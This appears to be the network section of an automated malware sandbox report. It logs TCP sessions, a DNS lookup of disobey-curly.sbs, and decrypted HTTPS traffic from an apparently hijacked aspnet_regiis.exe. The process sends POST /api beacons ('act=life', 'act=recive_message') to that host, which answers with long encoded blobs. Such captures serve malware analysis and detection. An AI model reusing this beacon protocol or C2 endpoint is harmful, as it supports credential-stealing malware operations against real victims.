Nov 23, 2024 14:59:54.026905060 CET	49732	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.026910067 CET	443	49732	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.150799036 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.150846004 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:54.150913000 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.151232004 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:54.151242971 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:55.416635990 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:55.416704893 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:55.419068098 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:55.419079065 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:55.419413090 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:55.430583000 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:55.430748940 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:55.430809021 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:55.430872917 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:55.430885077 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:56.378020048 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:56.378278971 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:56.378336906 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:56.406702995 CET	49734	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:56.406728029 CET	443	49734	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:56.595885992 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:56.595974922 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:56.596055031 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:56.596456051 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:56.596488953 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:57.908463955 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:57.908704996 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:57.909835100 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:57.909878969 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:57.910238981 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:57.911567926 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:57.911698103 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:57.911762953 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:58.742918968 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:58.743037939 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:58.743113041 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:58.743185997 CET	49737	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:58.743208885 CET	443	49737	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:58.935203075 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:58.935241938 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 14:59:58.935424089 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:58.935604095 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 14:59:58.935616016 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:00.236732960 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:00.236881018 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:00.238091946 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:00.238125086 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:00.238485098 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:00.265609026 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:00.265733004 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:00.265877962 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:00.266115904 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:00.266132116 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:01.120598078 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:01.120728970 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:01.120789051 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:01.148825884 CET	49739	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:01.148850918 CET	443	49739	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:01.452074051 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:01.452138901 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:01.452202082 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:01.452953100 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:01.452966928 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:02.720088005 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:02.720211983 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:02.721468925 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:02.721481085 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:02.721795082 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:02.731533051 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:02.731623888 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:02.731631994 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:03.426990032 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:03.427201986 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:03.427225113 CET	443	49741	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:03.427269936 CET	49741	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:03.848350048 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:03.848397017 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:03.848469019 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:03.848869085 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:03.848884106 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.069894075 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.070020914 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.073793888 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.073827982 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.074930906 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.076245070 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.076945066 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.077017069 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.077171087 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.077230930 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.078072071 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.078154087 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.078542948 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.078591108 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.078897953 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.078943014 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.079129934 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.079168081 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.079176903 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.079224110 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.079458952 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.079500914 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.079549074 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.079652071 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.079720020 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.127351046 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.127574921 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.127626896 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.127662897 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.127697945 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:05.127784967 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:05.127813101 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:08.362394094 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:08.362678051 CET	443	49742	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:08.362684965 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:08.362732887 CET	49742	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:08.372118950 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:08.372214079 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:08.372318983 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:08.372585058 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:08.372617960 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:09.634282112 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:09.634402990 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:09.635691881 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:09.635721922 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:09.636060953 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:09.637291908 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:09.637337923 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:09.637382030 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:10.352886915 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:10.353136063 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:10.353225946 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:10.353302956 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:10.353351116 CET	443	49744	172.67.223.140	192.168.2.4
Nov 23, 2024 15:00:10.353394985 CET	49744	443	192.168.2.4	172.67.223.140
Nov 23, 2024 15:00:10.353411913 CET	443	49744	172.67.223.140	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 14:59:49.437251091 CET	60451	53	192.168.2.4	1.1.1.1
Nov 23, 2024 14:59:49.582947016 CET	53	60451	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 14:59:49.437251091 CET	192.168.2.4	1.1.1.1	0xdc04	Standard query (0)	disobey-curly.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 14:59:49.582947016 CET	1.1.1.1	192.168.2.4	0xdc04	No error (0)	disobey-curly.sbs		172.67.223.140	A (IP address)	IN (0x0001)	false
Nov 23, 2024 14:59:49.582947016 CET	1.1.1.1	192.168.2.4	0xdc04	No error (0)	disobey-curly.sbs		104.21.70.128	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

disobey-curly.sbs

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 13:59:51 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: disobey-curly.sbs
2024-11-23 13:59:51 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-23 13:59:51 UTC	1019	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 13:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1efhp2h7cf8aua1332k912tu81; expires=Wed, 19-Mar-2025 07:46:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rQrjeoEJhBRj%2Bkf5qbCHazvR8eyis5U39cjPLZp8X4iZLZOpOQTi%2BOImp359AdLpHzZHO%2FbAM1RI425B6jfwGBCZJPm6SSprrvq6RU5McbbIUaKD1E6GlZrBqreDAB%2F%2BFrfm7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aea1784272b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1304736&cwnd=225&unsent_bytes=0&cid=24bb6695569b7a99&ts=973&x=0"
2024-11-23 13:59:51 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-23 13:59:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 13:59:53 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: disobey-curly.sbs
2024-11-23 13:59:53 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--lonikir&j=
2024-11-23 13:59:53 UTC	1016	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 13:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mgbh8e3av1idoi8oh2391u5h78; expires=Wed, 19-Mar-2025 07:46:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0saM3KBSjdJ4b7Yt0e7i%2FGgYJ8TigoiiI%2FwL59PMKhY76g3uinrsi3ym59WUI4rqYWgZPbDHTMw0PzfPP%2FehG60dWK9b%2FiN9ANWSG7oDQNIwHxnBzCDzrb6BktVDilsa8dFsQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aeaecf2a78d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=950&delivery_rate=1345622&cwnd=32&unsent_bytes=0&cid=1d35cf33eb9022b4&ts=710&x=0"
2024-11-23 13:59:53 UTC	353	IN	Data Raw: 34 34 36 63 0d 0a 48 76 36 52 6d 59 61 52 70 70 43 61 72 44 53 73 43 7a 41 71 69 69 4b 37 70 2b 4b 31 48 6a 55 53 51 34 35 34 65 7a 35 63 78 34 5a 6c 33 4f 65 37 76 4b 57 4b 73 75 6e 4a 46 70 5a 2f 51 6c 2f 76 44 70 6e 47 68 70 63 6b 55 33 4d 76 2f 52 31 58 48 43 71 71 70 43 53 59 38 50 58 31 39 49 71 79 2f 39 51 57 6c 6c 42 4c 43 4f 39 4d 6d 5a 33 41 30 48 52 58 63 79 2f 73 47 52 42 52 4c 4b 76 6c 64 70 4c 32 38 65 50 79 77 76 48 32 77 56 48 4a 62 6c 46 41 35 45 76 57 7a 34 2b 58 4d 68 64 33 4f 61 78 43 57 58 4d 35 73 2b 64 54 6e 2b 4c 79 70 4f 79 4b 36 37 6a 4a 57 6f 34 78 45 6b 76 76 51 4e 66 42 68 74 35 32 58 58 6f 6e 37 52 77 52 54 6a 57 68 37 6e 61 63 39 66 44 70 2b 39 62 38 2f 4d 5a 61 7a 32 52 52 43 4b 59 41 33 74 33 41 6a 7a 77 45 51 69 4c 39 43 Data Ascii: 446cHv6RmYaRppCarDSsCzAqiiK7p+K1HjUSQ454ez5cx4Zl3Oe7vKWKsunJFpZ/Ql/vDpnGhpckU3Mv/R1XHCqqpCSY8PX19Iqy/9QWllBLCO9MmZ3A0HRXcy/sGRBRLKvldpL28ePywvH2wVHJblFA5EvWz4+XMhd3OaxCWXM5s+dTn+LypOyK67jJWo4xEkvvQNfBht52XXon7RwRTjWh7nac9fDp+9b8/MZaz2RRCKYA3t3AjzwEQiL9C
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 6c 2f 73 54 67 38 4d 56 64 79 33 74 5a 51 65 56 4e 32 63 69 4b 32 48 39 58 64 79 76 6d 46 52 4e 59 4d 36 6a 69 66 4a 79 7a 74 61 54 30 33 4c 4b 67 6a 6e 58 4c 65 56 56 45 2f 67 4c 6a 68 5a 2b 5a 5a 52 64 33 4c 61 78 43 57 56 51 37 70 75 64 33 6b 2f 44 7a 37 2b 48 45 34 50 37 44 55 39 78 76 56 30 62 69 51 38 76 50 6a 74 46 2f 58 6e 73 6f 36 52 30 64 48 48 44 6c 34 32 54 63 71 37 76 46 2f 73 2f 2b 38 74 6c 57 6a 6e 59 63 55 61 68 48 31 59 58 59 6c 33 68 57 64 43 44 6f 46 42 64 59 4d 71 50 71 63 5a 50 31 38 65 54 30 7a 76 72 77 7a 31 76 46 5a 6c 4a 4e 35 55 54 66 79 59 48 53 50 42 6b 77 4a 76 52 61 51 52 77 51 6f 75 64 75 33 73 62 34 36 76 33 44 35 4c 6a 52 47 4e 63 70 56 55 53 6f 47 4a 6e 4c 68 64 68 75 56 6d 49 6b 34 67 67 56 57 54 69 6f 35 33 4b 63 39 76 Data Ascii: l/sTg8MVdy3tZQeVN2ciK2H9XdyvmFRNYM6jifJyztaT03LKgjnXLeVVE/gLjhZ+ZZRd3LaxCWVQ7pud3k/Dz7+HE4P7DU9xvV0biQ8vPjtF/Xnso6R0dHHDl42Tcq7vF/s/+8tlWjnYcUahH1YXYl3hWdCDoFBdYMqPqcZP18eT0zvrwz1vFZlJN5UTfyYHSPBkwJvRaQRwQoudu3sb46v3D5LjRGNcpVUSoGJnLhdhuVmIk4ggVWTio53Kc9v
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 35 4c 6a 52 47 4e 63 70 56 55 53 6f 47 4a 6e 4a 69 64 64 33 58 58 51 68 36 78 63 63 58 7a 6d 6d 36 58 75 57 2f 66 7a 67 2f 38 33 2f 2f 73 35 52 79 6d 78 41 54 65 46 4d 31 59 58 4f 6c 33 74 50 4d 48 6d 73 4e 52 35 4b 50 59 72 6e 62 5a 57 7a 35 4b 72 71 68 50 58 30 6a 67 36 4f 62 6c 64 41 34 30 62 52 78 5a 4c 53 63 6c 78 78 4b 2b 6f 62 46 46 41 34 70 65 56 38 6d 76 2f 37 34 2f 54 57 34 50 33 49 52 4d 51 70 48 41 6a 76 57 4a 6d 64 77 4f 46 73 51 47 45 33 72 69 38 61 55 6a 43 69 38 6a 79 44 76 65 4b 6b 39 4d 69 79 6f 49 35 64 7a 6d 56 56 51 4f 35 45 30 63 71 50 33 6d 35 57 66 43 2f 2b 48 52 6c 56 4d 4b 72 6f 64 5a 48 30 39 75 2f 35 79 66 62 2f 7a 78 61 41 4b 56 56 51 71 42 69 5a 38 35 44 61 63 48 6c 37 4c 65 56 61 42 68 49 6e 35 65 4e 77 33 4b 75 37 34 50 2f Data Ascii: 5LjRGNcpVUSoGJnJidd3XXQh6xccXzmm6XuW/fzg/83//s5RymxATeFM1YXOl3tPMHmsNR5KPYrnbZWz5KrqhPX0jg6ObldA40bRxZLSclxxK+obFFA4peV8mv/74/TW4P3IRMQpHAjvWJmdwOFsQGE3ri8aUjCi8jyDveKk9MiyoI5dzmVVQO5E0cqP3m5WfC/+HRlVMKrodZH09u/5yfb/zxaAKVVQqBiZ85DacHl7LeVaBhIn5eNw3Ku74P/
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 6c 50 4c 62 56 56 4d 37 6b 2b 5a 69 38 44 51 5a 42 63 6f 59 63 4d 39 4c 42 34 66 6e 36 52 6a 30 75 71 37 34 2f 2b 45 71 72 6a 43 56 63 4a 68 58 55 37 68 54 4e 50 4d 69 39 74 33 55 33 77 6f 36 52 77 59 57 54 75 6b 34 48 43 57 39 66 6a 6e 2f 4d 76 39 38 49 34 59 6a 6d 35 4b 43 4c 41 41 2f 4e 4b 4c 32 58 6f 58 62 32 2f 31 57 68 35 51 66 76 32 6b 63 4a 58 31 2f 65 48 2f 78 66 54 77 79 31 37 4b 61 46 52 4f 36 30 2f 64 77 49 48 59 65 46 74 2b 4b 2b 30 62 46 56 63 78 72 75 45 38 30 72 50 38 2f 4c 4f 63 73 73 6e 4e 51 4e 6c 35 58 67 6a 33 44 73 43 46 68 39 73 38 44 7a 41 67 2f 68 41 54 55 6a 75 71 34 58 2b 54 39 50 62 69 2f 38 37 37 38 4d 68 5a 78 33 74 52 52 4f 5a 48 31 38 6d 4f 32 6e 5a 55 66 57 47 69 57 68 35 45 66 76 32 6b 55 4a 76 2b 31 65 2f 2f 77 37 4c 6e Data Ascii: lPLbVVM7k+Zi8DQZBcoYcM9LB4fn6Rj0uq74/+EqrjCVcJhXU7hTNPMi9t3U3wo6RwYWTuk4HCW9fjn/Mv98I4Yjm5KCLAA/NKL2XoXb2/1Wh5Qfv2kcJX1/eH/xfTwy17KaFRO60/dwIHYeFt+K+0bFVcxruE80rP8/LOcssnNQNl5Xgj3DsCFh9s8DzAg/hATUjuq4X+T9Pbi/8778MhZx3tRROZH18mO2nZUfWGiWh5Efv2kUJv+1e//w7Ln
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 63 53 54 2f 41 41 67 59 57 32 30 47 78 48 63 32 50 64 44 42 70 4b 4e 61 6a 6f 50 49 4f 39 34 71 54 30 79 4c 4b 67 6a 6c 44 42 59 46 46 48 36 55 6e 56 79 49 58 65 65 56 5a 32 4a 65 59 51 47 56 6f 34 70 4f 46 32 6e 2f 4c 78 37 66 54 4d 39 66 76 63 46 6f 41 70 56 56 43 6f 47 4a 6e 73 68 38 56 79 52 7a 41 2b 6f 67 4e 5a 57 7a 4c 6c 76 44 79 59 2b 66 54 67 39 4d 6a 30 2f 63 68 62 7a 32 5a 54 53 4f 64 45 30 73 79 47 31 6e 46 53 66 53 58 2b 45 42 4a 54 4d 71 7a 6f 63 64 79 39 75 2b 50 72 68 4b 71 34 2f 31 76 41 5a 31 56 65 71 46 2b 58 33 4d 44 51 63 42 63 6f 59 65 30 57 46 6c 38 78 70 75 64 39 6c 75 48 70 36 50 72 4d 39 2f 54 46 57 4d 68 37 56 45 66 68 51 39 72 4d 68 39 39 77 58 58 4d 6d 72 46 52 5a 57 79 62 6c 76 44 79 2f 35 4f 76 70 73 39 75 38 34 59 35 52 77 Data Ascii: cST/AAgYW20GxHc2PdDBpKNajoPIO94qT0yLKgjlDBYFFH6UnVyIXeeVZ2JeYQGVo4pOF2n/Lx7fTM9fvcFoApVVCoGJnsh8VyRzA+ogNZWzLlvDyY+fTg9Mj0/chbz2ZTSOdE0syG1nFSfSX+EBJTMqzocdy9u+PrhKq4/1vAZ1VeqF+X3MDQcBcoYe0WFl8xpud9luHp6PrM9/TFWMh7VEfhQ9rMh99wXXMmrFRZWyblvDy/5Ovps9u84Y5Rw
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 6d 55 74 7a 44 6a 39 68 31 58 6e 51 70 37 78 6f 64 57 44 6d 67 35 33 43 58 39 50 6a 72 39 38 33 38 38 63 45 57 67 43 6c 56 55 4b 67 59 6d 65 53 62 31 48 42 61 4d 44 36 69 41 31 6c 62 4d 75 57 38 50 4a 44 39 2f 75 54 35 77 76 62 39 79 46 7a 4c 61 56 6c 4c 35 30 54 66 77 59 2f 58 64 31 35 78 4a 2b 6b 51 45 6c 6f 7a 70 75 4a 36 33 4c 32 37 34 2b 75 45 71 72 6a 75 54 63 4e 6c 56 51 6a 33 44 73 43 46 68 39 73 38 44 7a 41 71 34 42 34 65 58 44 4f 6d 37 48 6d 59 2b 66 37 6b 2b 39 62 36 2b 4d 6c 45 33 47 6c 62 54 65 52 44 32 63 47 47 33 6e 70 55 64 47 47 69 57 68 35 45 66 76 32 6b 55 5a 44 30 30 75 50 6f 68 4f 32 32 31 78 62 4a 5a 52 49 51 71 45 48 53 7a 34 2f 61 66 31 46 7a 4b 75 6b 51 47 46 73 32 71 50 5a 2f 6b 2f 7a 2f 35 50 7a 43 39 50 6e 42 55 4d 6c 67 55 30 Data Ascii: mUtzDj9h1XnQp7xodWDmg53CX9Pjr98388cEWgClVUKgYmeSb1HBaMD6iA1lbMuW8PJD9/uT5wvb9yFzLaVlL50TfwY/Xd15xJ+kQElozpuJ63L274+uEqrjuTcNlVQj3DsCFh9s8DzAq4B4eXDOm7HmY+f7k+9b6+MlE3GlbTeRD2cGG3npUdGGiWh5Efv2kUZD00uPohO221xbJZRIQqEHSz4/af1FzKukQGFs2qPZ/k/z/5PzC9PnBUMlgU0
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 2b 37 37 77 61 6c 31 33 4d 65 73 4e 46 68 78 77 35 65 73 38 78 4d 71 37 37 66 54 66 34 2b 37 44 52 73 6b 70 62 51 61 6f 57 4a 6d 64 77 4f 4a 2f 57 58 34 6d 2b 67 74 55 65 79 69 76 34 32 79 62 35 50 53 6b 76 59 54 30 75 4a 59 46 67 43 6c 57 57 61 67 59 69 5a 66 62 67 69 38 41 49 48 50 7a 56 41 41 63 4b 4f 57 38 4c 74 4b 7a 36 61 53 72 68 4c 58 37 33 45 54 49 61 6b 52 4c 72 33 37 6e 34 70 72 61 65 6b 42 68 48 39 49 64 41 31 45 34 73 76 55 77 69 66 44 31 36 76 54 53 73 72 61 4f 57 59 34 78 61 77 69 67 41 4f 61 4c 77 4d 38 38 44 7a 41 55 37 78 51 58 57 79 69 30 71 56 75 47 2f 76 33 7a 34 6f 53 38 75 4d 67 57 6c 6a 6b 63 43 4f 78 52 6d 5a 33 51 68 53 63 43 49 33 61 38 53 41 59 53 4a 2b 58 79 50 4d 53 68 74 61 54 68 68 4b 71 34 69 56 58 63 65 31 52 4c 2f 6b 4f Data Ascii: +77wal13MesNFhxw5es8xMq77fTf4+7DRskpbQaoWJmdwOJ/WX4m+gtUeyiv42yb5PSkvYT0uJYFgClWWagYiZfbgi8AIHPzVAAcKOW8LtKz6aSrhLX73ETIakRLr37n4praekBhH9IdA1E4svUwifD16vTSsraOWY4xawigAOaLwM88DzAU7xQXWyi0qVuG/v3z4oS8uMgWljkcCOxRmZ3QhScCI3a8SAYSJ+XyPMShtaThhKq4iVXce1RL/kO
